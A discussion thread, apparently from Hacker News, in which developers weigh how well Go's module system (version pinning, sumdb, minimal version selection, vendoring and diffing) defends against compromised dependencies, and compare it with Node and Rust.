| ▲ | gnfargbl 6 hours ago | |||||||
I'm a huge Go proponent but I don't know if I can see much about Go's module system which would really prevent supply-chain attacks in practice. The Go maintainers point [1] at the strong dependency pinning approach, the sumdb system and the module proxy as mitigations, and yes, those are good. However, I can't see what those features do to defend against an attack vector that we have certainly seen elsewhere: project gets compromised, releases a malicious version, and then everyone picks it up when they next run `go get -u ./...` without doing any further checking. Which I would say is the workflow for a good chunk of actual users. The lack of package install hooks does feel somewhat effective, but what's really to stop an attacker putting their malicious code in `func init() {}`? Compromising a popular and important project in this way would likely be noticed pretty quickly. But compromising something widely-used but boring? I feel like attackers would get away with that for a period of time that could be weeks. This isn't really a criticism of Go so much as an observation that depending on random strangers for code (and code updates) is fundamentally risky. Anyone got any good strategies for enforcing dependency cooldown? | ||||||||
| ▲ | MatthiasDev 2 hours ago | parent | next [-] | |||||||
A big thing is that Go does not install the latest version of transitive dependencies. Instead it uses Minimal version selection (MVS), see https://go.dev/ref/mod#minimal-version-selection. I highly recommend reading the article by Russ Cox mentioned in the ref. This greatly decreases your chances of being hit by malware released after a package is taken over. In Go, access to the os and exec require certain imports, imports that must occur at the beginning of the file, this helps when scanning for malicious code. Compare this JavaScript where one could require("child_process") or import() at any time. Personally, I started to vendor my dependencies using go mod vendor and diff after dependency updates. In the end, you are responsible for the effect of your dependencies. | ||||||||
| ▲ | devttyeu 5 hours ago | parent | prev | next [-] | |||||||
In Go you know exactly what code you’re building thanks to gosum, and it’s much easier to audit changed code after upgrading - just create vendor dirs before and after updating packages and diff them; send to AI for basic screening if the diff is >100k loc and/or review manually. My projects are massive codebases with 1000s of deps and >200MB stripped binaries of literally just code, and this is perfectly feasible. (And yes I do catch stuff occasionally, tho nothing actively adversarial so far) I don’t believe I can do the same with Rust. | ||||||||
| ||||||||
| ▲ | PunchyHamster 4 hours ago | parent | prev | next [-] | |||||||
> However, I can't see what those features do to defend against an attack vector that we have certainly seen elsewhere: project gets compromised, releases a malicious version, and then everyone picks it up when they next run `go get -u ./...` without doing any further checking. Which I would say is the workflow for a good chunk of actual users. You can't, really, aside from full on code audits. By definition, if you trust a maintainer and they get compromised, you get compromised too. Requiring GPG signing of releases (even by just git commit signing) would help but that's more work for people to distribute their stuff, and inevitably someone will make insecure but convenient way to automate that away from the developer | ||||||||
| ▲ | asmor 6 hours ago | parent | prev [-] | |||||||
The Go standard library is a lot more comprehensive and usable than Node, so you need less dependencies to begin with. | ||||||||